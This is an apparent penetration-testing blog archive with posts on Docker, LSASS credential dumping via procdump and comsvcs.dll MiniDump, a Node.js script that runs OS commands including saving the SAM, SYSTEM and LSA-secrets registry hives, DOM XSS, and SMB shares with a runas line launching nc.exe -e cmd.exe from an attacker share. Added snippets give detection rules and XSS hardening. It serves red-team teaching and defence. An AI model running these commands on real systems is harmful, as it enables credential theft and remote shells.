Penetration testing bY eXpl0i13r<br />
<br />
<b>Dockers and Containers</b> (published 2020-04-18)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
For years, developers have struggled to set up development environments with the right tool configurations, and with the time this takes.<br />
<br />
This becomes even more complex when the developer uses a diverse technology stack. Consider a scenario where the developer has written Python code that accepts web requests, uses MongoDB as the back end, and feeds an analytics application that generates reports.<br />
<br />
As you can see, a diverse technology stack is involved here. Is it an easy task to set up all these components and connect them to each other? Not at all. That's where Docker comes into the picture.<br />
<br />
With Docker, installing the required tools/stack takes just a few commands! For the rest, you rely on Docker to take care of the back-end dependencies.<br />
<br />
<br />
<ol style="text-align: left;">
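<li>docker run --name=mongo-db -d mongo (This pulls the image if needed and gives you a complete running MongoDB)</li>
<li>docker run --name=mysql-db -e MYSQL_ROOT_PASSWORD=&lt;password&gt; -d mysql (This gives you a complete running MySQL; image names are lowercase, and the official image needs a root password setting to start)</li>
<li>docker run --name=web -d nginx (This gives you a complete running NGINX; each container needs its own name)</li>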
</ol>
<div>
It's that easy! Of course, additional configuration can be passed as parameters; refer to the respective Docker documentation for details.</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzCEDVYRSdgCR0ngn5YHUrwQ1cUNByGzsquYKPVgPcNIre0YYotTBsSVU7vWCaiFdAvDmU9hxt2KIUEuiVQFjgkIHPpiDE3e3x83MkDcxZwjLYEmkF3YOgONMqsHL23XhasH26jVE-E4iw/s1600/dockercontainer_final.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="928" data-original-width="824" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzCEDVYRSdgCR0ngn5YHUrwQ1cUNByGzsquYKPVgPcNIre0YYotTBsSVU7vWCaiFdAvDmU9hxt2KIUEuiVQFjgkIHPpiDE3e3x83MkDcxZwjLYEmkF3YOgONMqsHL23XhasH26jVE-E4iw/s400/dockercontainer_final.png" width="355" /></a></div>
<div>
<br /></div>
<div>
By default, when a container is started, it is allocated an IP address from the subnet range defined for the bridge network.</div>
<div>
<br /></div>
<div>
First, we can list the networks as shown below:</div>
<div>
<br /></div>
<div>
<b>docker network ls</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz4b3MmDjePbveN1zhF2xPx358tcIvLqka5-FJ25aNvYfAg9yJra_lB1pVo8vKn2lA-dRFAeikLeeUUyHNjgJKxoDaK19fINCcfHkQla7sV5-rZvLrAgGdGSTsbqVF9FHd5W9npaeiQizG/s1600/docker+list+network.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="141" data-original-width="690" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz4b3MmDjePbveN1zhF2xPx358tcIvLqka5-FJ25aNvYfAg9yJra_lB1pVo8vKn2lA-dRFAeikLeeUUyHNjgJKxoDaK19fINCcfHkQla7sV5-rZvLrAgGdGSTsbqVF9FHd5W9npaeiQizG/s400/docker+list+network.JPG" width="400" /></a></div>
<div>
<br /></div>
<div>
To view the details of the default IP range configured, we can use the following command:</div>
<div>
<br /></div>
<div>
<b>docker network inspect bridge</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJQ4RwRHkZYoSEzbudJKOS3HB8PAaDLkJX0UDzMfBsR3bD8KmmB-8_bAcrVfX_756KTrViB-kMvNijQB7aBgDl67xxgDCa7HLoQ9hADVwwM87Cg-HyGsIIa-BtSVDPg8WVGuoPdwjTFVYl/s1600/docker+subnet.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="834" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJQ4RwRHkZYoSEzbudJKOS3HB8PAaDLkJX0UDzMfBsR3bD8KmmB-8_bAcrVfX_756KTrViB-kMvNijQB7aBgDl67xxgDCa7HLoQ9hADVwwM87Cg-HyGsIIa-BtSVDPg8WVGuoPdwjTFVYl/s400/docker+subnet.JPG" width="400" /></a></div>
<div>
<br /></div>
<div>
Now we know the default range allocated to containers. We can list the IP address of a running container by executing the following command:</div>
<div>
<br /></div>
<div>
<b>docker container inspect --format '{{ .NetworkSettings.IPAddress }}' &lt;container name&gt;</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxResLCN9FGE6ozi9UJR6FCFv3jv8YabklZnf__rnjRIcexsLY4rUJSV1-6kbHBrdav4oWaqiI0iOcKoaV8ZjPtvrEfT-v78DoCOgL9p270Evsdfj_jy3Jhip8bbllxK3Wbj1PRL2wg1Sk/s1600/conatiners+ip.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="1055" height="75" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxResLCN9FGE6ozi9UJR6FCFv3jv8YabklZnf__rnjRIcexsLY4rUJSV1-6kbHBrdav4oWaqiI0iOcKoaV8ZjPtvrEfT-v78DoCOgL9p270Evsdfj_jy3Jhip8bbllxK3Wbj1PRL2wg1Sk/s400/conatiners+ip.JPG" width="400" /></a></div>
<div>
<br /></div>
<div>
List the Docker containers running on the system along with their details:</div>
<div>
<br /></div>
<div>
<b>docker ps</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCsOmJpE9-9Mqy6YeFmeTHXfJq2uVKZ9K4rB49DuR8LRLs8sgAr74OjS-qCRjEjmyDAy9CcbwXmFqAlQxyXMvKUZ8Pk6_bs5SsmJvUUsfZuCUg890lpHvLLgJo0twGovpt36LmSfY6GFT/s1600/docker+ps.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="226" data-original-width="1600" height="45" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCsOmJpE9-9Mqy6YeFmeTHXfJq2uVKZ9K4rB49DuR8LRLs8sgAr74OjS-qCRjEjmyDAy9CcbwXmFqAlQxyXMvKUZ8Pk6_bs5SsmJvUUsfZuCUg890lpHvLLgJo0twGovpt36LmSfY6GFT/s320/docker+ps.JPG" width="320" /></a></div>
<div>
<br /></div>
</div>
Posted by expl0i13r<br />
<br />
<b>LSASS Dumping Methods ( For Mimikatz )</b> (published 2020-04-13)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In every attack we need to obtain Windows credentials; this is a super important task. We need to target the "LSASS.EXE" process and dump its memory so that we can extract credentials from the dump using Mimikatz.<br />
<br />
<br />
Here are some of the important methods:<br />
<b><u><br /></u></b>
<b><u>Using ProcDump :</u></b><br />
<b><u><br /></u></b>
1. The favorite method of dumping is "procdump.exe". This tool is from Microsoft <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/pstools">Pstools</a><br />
2. Download ProcDump.exe and upload it to the remote system<br />
3. Command: <b>procdump -ma lsass.exe lsass.dmp</b><br />
<b><br /></b>
<u><b><br /></b></u>
<u><b>Using VB Script :</b></u><br />
<u><b><br /></b></u>
Download script from here :<br />
<a href="https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp">https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp</a><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8iVGbjRESPNobfH9NyI6BkOusudJ_7eRkaYYPy1sD1tCmpMfP5JmdPg0f0x5gGcolmFXOv_CjYSyEubVjxJ1gPOVxAaJT-Qn-TmWi2El1e_Gtm846YzC6VHX-eXlYU9ykJj54jWYZvLB/s1600/lsass_vbs.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="410" data-original-width="1026" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd8iVGbjRESPNobfH9NyI6BkOusudJ_7eRkaYYPy1sD1tCmpMfP5JmdPg0f0x5gGcolmFXOv_CjYSyEubVjxJ1gPOVxAaJT-Qn-TmWi2El1e_Gtm846YzC6VHX-eXlYU9ykJj54jWYZvLB/s400/lsass_vbs.PNG" width="400" /></a></div>
<br />
<u><b>rundll32 Command :</b></u><br />
<b><u><br /></u></b>
Essentially, the VBS script from the previous method uses the following command to dump the Lsass.exe process:<br />
<br />
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full<br />
<br />
So even if you do not have the VB script with you, you can still fire up the command and dump the LSASS process.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD4tIN7HNnK-tDdLpnnznhbl3UZrMPU6CFF6DTAiOp6dAL3u_hYK6mcRMADJug0CLG_pIjs7-Ee5WCa3J6lJuH7R7Xo1YTAGt_cixcNJ8JsJaRFkMTuIPP-TxcTgb87M2-HnI2DM0WlOei/s1600/lsass_via+rundll.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="362" data-original-width="622" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD4tIN7HNnK-tDdLpnnznhbl3UZrMPU6CFF6DTAiOp6dAL3u_hYK6mcRMADJug0CLG_pIjs7-Ee5WCa3J6lJuH7R7Xo1YTAGt_cixcNJ8JsJaRFkMTuIPP-TxcTgb87M2-HnI2DM0WlOei/s320/lsass_via+rundll.PNG" width="320" /></a></div>
<br />
<br /></div>
Posted by expl0i13r<br />
<br />
<b>Executing Commands via Node.js ( Portable Node.exe )</b> (published 2020-04-01)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
I was exploring Node.js and thought I would publish an article here on how we can leverage Node.js in pentesting.<br />
<br />
I saw a few articles about malware that targets organizations in the USA and UK and uses Node.js in its attacks. It seems a really interesting idea to explore how we can leverage this in our Red Teams!<br />
<br />
Quick introduction to Node.js<br />
<br />
1. It's an open-source JavaScript runtime environment<br />
2. In simple words, it's a server-side JavaScript programming language<br />
3. Node.js gives you access to its API, which can control the system.<br />
<br />
<br />
As in other programming languages, you can create, read and modify files, access the OS, etc.<br />
<br />
For the complete list of APIs, refer to - <a href="https://nodejs.org/docs/latest-v13.x/api/">https://nodejs.org/docs/latest-v13.x/api/</a><br />
<br />
<br />
1. Install Node.js on Windows<br />
2. After installation you can access it with the 'node' command<br />
3. In the Node console we can execute Node commands<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheI8HU3ChCCukgYmVWzJ05C4E9l4GomUfvEnZUtK3Bxz6jmRPzmCWZjTosCV2rS2l5htzJcxbpoq568vy7o4-0rC8-LgdKtoK7ohcKWITNs_ZydfD5xY3z1HNEZwyrU4koEhTKos_eLL-Z/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="466" data-original-width="1316" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheI8HU3ChCCukgYmVWzJ05C4E9l4GomUfvEnZUtK3Bxz6jmRPzmCWZjTosCV2rS2l5htzJcxbpoq568vy7o4-0rC8-LgdKtoK7ohcKWITNs_ZydfD5xY3z1HNEZwyrU4koEhTKos_eLL-Z/s400/1.png" width="400" /></a></div>
<br />
Now, as pen-testers, we don't have to install Node.js on the remote system; we can always carry the portable node.exe file and drop it on the remote system. ( I don't have to tell you where to get Node.exe, you can figure that out yourself! )<br />
<br />
<br />
Here is the code we can use to execute OS commands via the Node.js API.<br />
<br />
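<i>// exec() comes from Node's built-in child_process module</i><br />
<i>const { exec } = require("child_process");</i><br />
<i><br /></i>
<i>// exec() expects one command string, so join the command-line arguments</i><br />
<i>const command = process.argv.slice(2).join(" ");</i><br />
<i><br /></i>
<i>exec(command, (error, stdout, stderr) => {</i><br />
<i>&nbsp;&nbsp;// the command could not be started or exited with a non-zero code</i><br />
<i>&nbsp;&nbsp;if (error) {</i><br />
<i>&nbsp;&nbsp;&nbsp;&nbsp;console.log(`error: ${error.message}`);</i><br />
<i>&nbsp;&nbsp;&nbsp;&nbsp;return;</i><br />
<i>&nbsp;&nbsp;}</i><br />
<i>&nbsp;&nbsp;// the command wrote to its error stream</i><br />
<i>&nbsp;&nbsp;if (stderr) {</i><br />
<i>&nbsp;&nbsp;&nbsp;&nbsp;console.log(`stderr: ${stderr}`);</i><br />
<i>&nbsp;&nbsp;&nbsp;&nbsp;return;</i><br />
<i>&nbsp;&nbsp;}</i><br />
<i><br /></i>
<i>&nbsp;&nbsp;console.log(`stdout: ${stdout}`);</i><br />
<i>});</i><br />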
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8zeaqIVx_mcsYpq9w588BbT4LcjpDKH1S9IPCDwfAMhQK-lnQoOdogSHaL8eDALANcGxdRpBqzs4qnOHDRReWtBDGhPCuZea5jXIV66A0fHlAmXNNpyg392TzZrELTqnCZb5Er6XxFet/s1600/3.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="759" data-original-width="685" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8zeaqIVx_mcsYpq9w588BbT4LcjpDKH1S9IPCDwfAMhQK-lnQoOdogSHaL8eDALANcGxdRpBqzs4qnOHDRReWtBDGhPCuZea5jXIV66A0fHlAmXNNpyg392TzZrELTqnCZb5Er6XxFet/s320/3.png" width="288" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Executing OS commands via Node.js</td></tr>
</tbody></table>
<br />
Now we can pass the following important commands as well:<br />
<br />
1. node.exe file.js "reg save HKLM\SAM c:\SAM"<br />
2. node.exe file.js "reg save HKLM\SYSTEM c:\SYSTEM"<br />
3. node.exe file.js "reg save HKEY_LOCAL_MACHINE\Security\Policy\Secrets c:\lsa"<br />
<br />
<br />
This is just one way of executing OS commands via the portable Node.exe<br />
<div>
<br /></div>
<div>
A lot more can be done with this, even simple command-and-control code that calls back to your web server and fetches commands, or a web server written in Node.js that we can use for accessing the victim's files!<br />
<br />
<br />
There have been instances of malware code containing hard-coded nodejs.org links for downloading Node.exe:<br />
<a href="https://nodejs.org/dist/latest-v10.x/win-x86/">https://nodejs.org/dist/latest-v10.x/win-x86/</a><br />
<br />
<br />
Here is a good article on malware using Node.js:<br />
<a href="https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/">https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/</a><br />
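<br />
From the defender's side, the command lines in this post and in the LSASS dumping post leave recognisable process-creation records. The following is an added example, not code from the original posts, that flags them. The event objects are constructed samples that borrow Sysmon Event ID 1 field names; the rule ids and the list of expected Node.js install directories are assumptions.<br />

```javascript
// Added example: flag process-creation events that match the command lines
// discussed in the posts. Field names (Image, CommandLine, ParentImage) follow
// Sysmon Event ID 1; the events themselves are CONSTRUCTED samples.
// Assumptions: the rule ids and the directories where node.exe is expected.

const EXPECTED_NODE_DIRS = [
  "c:\\program files\\nodejs\\",
  "c:\\program files (x86)\\nodejs\\",
];

const PROCDUMP_RE = /\bprocdump(64)?(\.exe)?\b/i;
const FULL_DUMP_FLAG_RE = /\s[-\/]ma\b/i;
const REG_SAVE_RE =
  /\breg(\.exe)?["\s]+save\s+"?(hklm|hkey_local_machine)\\(sam|system|security)\b/i;

// Command line of an event as a string (empty if the field is missing).
function cmdOf(event) {
  return String(event.CommandLine || "");
}

// File name part of a Windows path, lower-cased.
function baseName(path) {
  return String(path || "").toLowerCase().split("\\").pop();
}

// True for a node.exe that runs from somewhere other than the expected install dirs.
function isUnexpectedNode(image) {
  const p = String(image || "").toLowerCase();
  return baseName(p) === "node.exe" && !EXPECTED_NODE_DIRS.some((d) => p.startsWith(d));
}

const RULES = [
  { // procdump -ma lsass.exe ...
    id: "lsass-dump-procdump",
    test: (e) => PROCDUMP_RE.test(cmdOf(e)) && FULL_DUMP_FLAG_RE.test(cmdOf(e)) &&
      /lsass/i.test(cmdOf(e)),
  },
  { // rundll32 ...comsvcs.dll, MiniDump <pid> ...
    id: "lsass-dump-comsvcs",
    test: (e) => baseName(e.Image) === "rundll32.exe" &&
      /comsvcs\.dll/i.test(cmdOf(e)) && /minidump/i.test(cmdOf(e)),
  },
  { // reg save of the SAM, SYSTEM or SECURITY hives
    id: "registry-hive-save",
    test: (e) => REG_SAVE_RE.test(cmdOf(e)),
  },
  { // portable node.exe as the process itself or as its parent
    id: "node-outside-install-dir",
    test: (e) => isUnexpectedNode(e.Image) || isUnexpectedNode(e.ParentImage),
  },
];

// Ids of every rule an event matches, in rule order.
function matchRules(event) {
  return RULES.filter((r) => r.test(event)).map((r) => r.id);
}

// Only the events that matched, with their rule ids attached.
function detect(events) {
  return events
    .map((e) => ({ event: e, rules: matchRules(e) }))
    .filter((hit) => hit.rules.length > 0);
}

// CONSTRUCTED sample events (not real telemetry).
const CMD = "C:\\Windows\\System32\\cmd.exe";
const SAMPLE_EVENTS = [
  { Image: "C:\\Tools\\procdump.exe", ParentImage: CMD,
    CommandLine: "procdump -ma lsass.exe lsass.dmp" },
  { Image: "C:\\Windows\\System32\\rundll32.exe", ParentImage: CMD,
    CommandLine: "rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 992 C:\\Users\\Public\\lsass.bin full" },
  { Image: "C:\\Users\\Public\\node.exe", ParentImage: CMD,
    CommandLine: 'node.exe file.js "reg save HKLM\\SAM c:\\SAM"' },
  { Image: CMD, ParentImage: "C:\\Users\\Public\\node.exe",
    CommandLine: 'C:\\Windows\\system32\\cmd.exe /d /s /c "reg save HKLM\\SYSTEM c:\\SYSTEM"' },
  { Image: "C:\\Program Files\\nodejs\\node.exe", ParentImage: CMD,
    CommandLine: "node.exe server.js" },
  { Image: "C:\\Windows\\System32\\reg.exe", ParentImage: CMD,
    CommandLine: "reg query HKLM\\SOFTWARE\\Microsoft" },
];

for (const hit of detect(SAMPLE_EVENTS)) {
  console.log(hit.rules.join(", "), "<=", hit.event.CommandLine);
}
```

Command-line matching misses renamed binaries, so treat these rules as one signal alongside process-access telemetry for lsass.exe (Sysmon Event ID 10).<br />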
<br />
<br />
<br /></div>
<div>
<br /></div>
</div>
Posted by expl0i13r<br />
<br />
<b>Document Object Model and DOM XSS</b> (published 2020-04-01)
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><u><br /></u></b><b><u>DOM (Document Object Model)</u></b><br />
<br />
How many times have you seen applications in the past where clicking a button or selecting an item from a list box refreshes the complete page? Basically, each such event initiates a request to the server, and the server responds with the complete HTML code to the client browser.<br />
<br />
Isn't this tedious? Why load a complete HTML page with thousands of tags for each request? What if, instead, there were a way to update only a specific tag within the HTML code without loading the whole page?<br />
<br />
In this case, we can give control to JavaScript executing in the client browser to change/modify/update data within specific tags in the HTML. The other tags and data in the page remain the same, without any refresh. This is much faster!<br />
<br />
By manipulating the DOM,<br />
1. You can create applications that update the data of the page without needing a refresh.<br />
2. You can create applications that are customizable by the user and then change the layout of the page without a refresh.<br />
<br />
<br />
Key points in DOM,<br />
1. A page loaded in the application contains thousands of HTML tags; consider each of these an object.<br />
2. The browser creates a hierarchical view of the tags so that client-side JavaScript can query a specific tag, extract its data, and change/modify/update the data within the tags as required by the application or user.<br />
<br />
<br />
Example :<br />
<br />
Consider a website that lists flight tickets: you select the source and destination and click search, after which a request is sent to the server to retrieve the price.<br />
<br />
Once the price is retrieved, JavaScript can query for the specific tag in the application where the price data needs to be updated. Using DOM methods, JavaScript can change/update/modify the data in that specific tag, and now you see the price in front of you!<br />
<br />
<br />
<br />
For key methods in DOM, refer to: <a href="https://www.w3schools.com/js/js_htmldom_document.asp">https://www.w3schools.com/js/js_htmldom_document.asp</a><br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3IEktYRX4WgsxXW0odkFo7UkKLACQS7V-_cJ7evStDCLUGTmCb6qXevSZE53f-ClTHfbKc8IWooxUW-7oH1Ke4JgKYY-F8e0dgxTPuhTisybWM5ig_dQIwqOf4nrQuf6FfuVpMhV_GEk/s1600/1.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="351" data-original-width="824" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3IEktYRX4WgsxXW0odkFo7UkKLACQS7V-_cJ7evStDCLUGTmCb6qXevSZE53f-ClTHfbKc8IWooxUW-7oH1Ke4JgKYY-F8e0dgxTPuhTisybWM5ig_dQIwqOf4nrQuf6FfuVpMhV_GEk/s320/1.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px; text-align: center;"><b><i>Querying the Tags using DOM Methods </i></b></td></tr>
</tbody></table>
<br />
<b><u>DOM Based XSS Attack :</u></b><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><img alt="Diagram of a DOM-based XSS attack" height="255" src="https://excess-xss.com/dom-based-xss.png" style="margin-left: auto; margin-right: auto;" width="400" /></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;">Reference : <a href="https://excess-xss.com/">excess-xss.com</a></td></tr>
</tbody></table>
<br />
<b><u><br /></u></b><b><u>Summary :</u></b><br />
1. Attacker crafts a URL with an XSS payload<br />
2. Sends the link to the victim<br />
3. Victim opens the link<br />
4. Request is sent to the server<br />
5. Using the DOM method document.querySelector, the content of the parameter "keyword" is written into the page without appropriate validation.<br />
<br />
Before the page is updated via querySelector, the string being passed should be appropriately validated.<br />
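<br />
An added example, not from the original post, that contrasts the unvalidated update from step 5 with a validated, text-only update. The element id "#result", the function names and the allow-list rule are assumptions; in a browser `doc` is `document`, and a small stub stands in for it so the logic also runs under Node.<br />

```javascript
// Added example: DOM XSS sink vs. hardened update for the "keyword" parameter.
// Assumptions (not from the post): element id "#result", the allow-list rule,
// and all function names. In a browser pass `document` and `location.href`.

// Read the "keyword" query parameter from a URL string (percent-decoded).
function getKeyword(href) {
  return new URL(href).searchParams.get("keyword") || "";
}

// VULNERABLE: attacker-controlled text is parsed as markup by innerHTML.
function showKeywordUnsafe(doc, href) {
  const el = doc.querySelector("#result");
  el.innerHTML = "Results for: " + getKeyword(href);
  return el;
}

// Allow-list validation: letters, digits, space, dash, underscore; 1 to 64 chars.
const KEYWORD_RE = /^[\p{L}\p{N} _-]{1,64}$/u;

function isValidKeyword(keyword) {
  return KEYWORD_RE.test(keyword);
}

// HARDENED: validate first, then write through textContent, which never parses markup.
function showKeywordSafe(doc, href) {
  const el = doc.querySelector("#result");
  const keyword = getKeyword(href);
  el.textContent = isValidKeyword(keyword)
    ? "Results for: " + keyword
    : "Invalid search keyword";
  return el;
}

// For code paths that must build an HTML string: escape the value for that context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function resultHtml(keyword) {
  return "<p>Results for: " + escapeHtml(keyword) + "</p>";
}

// Minimal stand-in for `document` so the logic can be exercised outside a browser.
function makeStubDocument() {
  const el = { innerHTML: "", textContent: "" };
  return { querySelector: (sel) => (sel === "#result" ? el : null) };
}

// CONSTRUCTED sample URLs.
const BENIGN_URL = "https://shop.example/search?keyword=red%20shoes";
const CRAFTED_URL =
  "https://shop.example/search?keyword=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E";

console.log(showKeywordUnsafe(makeStubDocument(), CRAFTED_URL).innerHTML);
console.log(showKeywordSafe(makeStubDocument(), CRAFTED_URL).textContent);
console.log(showKeywordSafe(makeStubDocument(), BENIGN_URL).textContent);
```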
<br />
<br />
<b>References :</b><br />
<br />
<a href="https://hackerone.com/reports/324303">https://hackerone.com/reports/324303</a><br />
<br />
<a href="https://hackerone.com/reports/398054">https://hackerone.com/reports/398054</a><br />
<br />
<a href="https://www.freecodecamp.org/news/whats-the-document-object-model-and-why-you-should-know-how-to-use-it-1a2d0bc5429d/">https://www.freecodecamp.org/news/whats-the-document-object-model-and-why-you-should-know-how-to-use-it-1a2d0bc5429d/</a><br />
<br />
<a href="https://www.researchgate.net/figure/DOM-XSS-attack-exploitation_fig4_317560469">https://www.researchgate.net/figure/DOM-XSS-attack-exploitation_fig4_317560469</a><br />
<br />
<a href="https://excess-xss.com/">https://excess-xss.com/</a><br />
<br />
<a href="https://www.w3schools.com/js/js_htmldom_document.asp">https://www.w3schools.com/js/js_htmldom_document.asp</a></div>
Posted by expl0i13r<br />
<br />
<b>Remote Shares</b> (published 2019-08-03)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<b><u>File Sharing Server on Kali </u></b><br />
<br />
Download smbserver.py from the following link:<br />
<br />
https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py<br />
<br />
Starting SMB Server<br />
<br />
<b><i>python smbserver.py MYSHARE /root/files/</i></b><br />
<b><i><br /></i></b>
<b><i><br /></i></b>
This is helpful in scenarios where you need to transfer files to the target system from your SMB share.<br />
<br />
<br />
<br />
<b><u>Execute files directly from remote SMB shares </u></b><br />
<br />
runas /savecred /user:access\Administrator "c:\windows\system32\cmd.exe /c \\10.10.14.8\MYSHARE\nc.exe -nv &lt;IP Address&gt; &lt;Port&gt; -e cmd.exe"<br />
<br />
<br />
<b><u>Mount remote shares via command line </u></b><br />
<br />
net use e: \\IP Address\MYSHARE<br />
<br />
<br /></div>
Posted by expl0i13r<br />
<br />
<b>Cryptography Mind Map</b> (published 2017-01-28)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hi,<br />
<br />
Sharing my Crypto Mind Map for quick reference.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj_aMQ7ivirhde8NhiWEM02uZABWL6Mi0sr-ywCvoFBMYwJYzDFmEw1BuAewc6hK18lLGvo5PusOq2gS_OHlWQKS9OY5ihzkWMbci4FPfHM4EKSfTHZwgvU9l80AaLF2QhxutBHy01UCpd/s1600/Crypto_1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj_aMQ7ivirhde8NhiWEM02uZABWL6Mi0sr-ywCvoFBMYwJYzDFmEw1BuAewc6hK18lLGvo5PusOq2gS_OHlWQKS9OY5ihzkWMbci4FPfHM4EKSfTHZwgvU9l80AaLF2QhxutBHy01UCpd/s400/Crypto_1.png" width="362" /></a></div>
<br />
Download from <a href="https://drive.google.com/open?id=0B4fmHoqW8qjTRUN3VlBnZGU2YnM">here</a><br />
<br />
<br />
Hope this helps!</div>
Posted by expl0i13r<br />
<br />
<b>Office of Foreign Assets Control (OFAC)</b> (published 2017-01-27)
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b><u>Office of Foreign Assets Control (OFAC)</u></b><br />
<br />
The Office of Foreign Assets Control (OFAC) is a financial intelligence and enforcement agency of the U.S. Treasury Department.<br />
<br />
Financial institutions use the data/list provided by OFAC <a href="https://www.treasury.gov/resource-center/sanctions/SDN-List/Pages/sdn_data.aspx">here</a>.<br />
This OFAC list covers individuals, groups, and entities, such as terrorists and narcotics traffickers, designated under programs that are not country-specific - https://www.treasury.gov<br />
<br />
May be helpful !</div>
Posted by expl0i13r<br />
<br />
<b>Using PGP for Gmail - (Pretty Good Privacy)</b> (published 2017-01-19)
<div dir="ltr" style="text-align: left;" trbidi="on">
What is PGP?<br />
<br />
Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy and authentication for data communication.<br />
<br />
PGP is often used for signing, encrypting, and decrypting texts and e-mails, and to increase the security of e-mail communications.<br />
<br />
<br />
<br />
Public Key :<br />
This key is public to everyone. You need to share your public key with your friends so that they can encrypt messages and send them to you.<br />
<br />
Private Key:<br />
This key is private, and you should not share it with anyone. With it you can decrypt emails encrypted with your public key.<br />
<br />
For demonstration we will use Mailvelope.<br />
<br />
Mailvelope is a Chrome plugin that can be used for generating a public key and a private key.<br />
You can also use it to send PGP-encrypted emails to your friends and to decrypt the ones they send you.<br />
<br />
<br />
<a href="https://www.mailvelope.com/en">Link</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
